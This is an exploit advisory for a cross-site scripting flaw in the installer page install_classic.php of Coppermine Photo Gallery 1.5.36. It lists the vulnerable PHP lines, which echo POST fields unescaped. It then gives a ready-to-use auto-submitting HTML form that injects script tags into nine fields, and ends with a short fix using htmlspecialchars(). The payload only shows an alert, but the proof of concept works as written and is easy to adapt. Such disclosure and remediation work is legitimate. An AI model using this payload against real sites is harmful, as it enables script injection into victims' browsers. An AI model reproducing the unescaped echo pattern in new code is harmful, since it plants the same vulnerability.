[+] Exploit Title: Coppermine Photo Gallery 1.5.36 Cross Site Scripting
[+] Exploit Author: Ehsan Hosseini
[+] Date: 27/7/2015
[+] Vendor Homepage: http://coppermine-gallery.net/
[+] Software Link:
http://sourceforge.net/projects/coppermine/files/Coppermine/1.5.x/cpg1.5.36.zip/download
[+] Version: 1.5.36
[+] Tested on: Windows
[+] CVE : N/A

===============================
Introduction :
Coppermine Photo Gallery is a multi-purpose fully-featured and
integrated web picture gallery script written in PHP.
Coppermine Photo Gallery suffers from a Cross site scripting vulnerability.
===============================
Vulnerable file is :
localhost/cpg15x/install_classic.php
===============================
Vulnerable Code :
316 : <input type="text" class="textinput" name="admin_username"
value="<?php echo $_POST['admin_username'] ?>" />
323 : <input type="text" class="textinput" name="admin_password"
value="<?php echo $_POST['admin_password'] ?>" />
313 : <input type="text" class="textinput" name="admin_email"
value="<?php echo $_POST['admin_email'] ?>" />
345 : <input type="text" class="textinput" name="dbserver"
value="<?php echo ($_POST['dbserver'] ? $_POST['dbserver'] :
'localhost') ?>" />
352 : <input type="text" class="textinput" name="dbname" value="<?php
echo $_POST['dbname'] ?>" />
359 : <input type="text" class="textinput" name="dbuser" value="<?php
echo $_POST['dbuser'] ?>" />
366 : <input type="text" class="textinput" name="dbpass" value="<?php
echo $_POST['dbpass'] ?>" />
373 : <input type="text" class="textinput" name="table_prefix"
value="<?php echo ($_POST['table_prefix'] ? $_POST['table_prefix'] :
'cpg15x_') ?>" />
390 : <input type="text" class="textinput" name="impath" value="<?php
echo $_POST['impath'] ?>" />
===============================
Exploit :
<body onload='document.exploit.submit()'>
<form name='exploit'
action='http://localhost/cpg15x//install_classic.php' method='POST'>
<input type='hidden' name='admin_username'
value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='admin_password'
value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='admin_email'
value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='dbserver'
value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='dbname'
value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='dbuser'
value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='dbpass'
value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='table_prefix'
value='"><script>alert(/EXPLOITED/)</script>'>
<input type='hidden' name='impath'
value='"><script>alert(/EXPLOITED/)</script>'>
</form>
==================================================
Path :
To fix this vulnerability you use htmlspecialchars() function .
<input type="text" class="textinput" name="admin_username"
value="<?php echo htmlspecialchars($_POST['admin_username']) ?>" />
And other lines, too.

Discovered By : Ehsan Hosseini.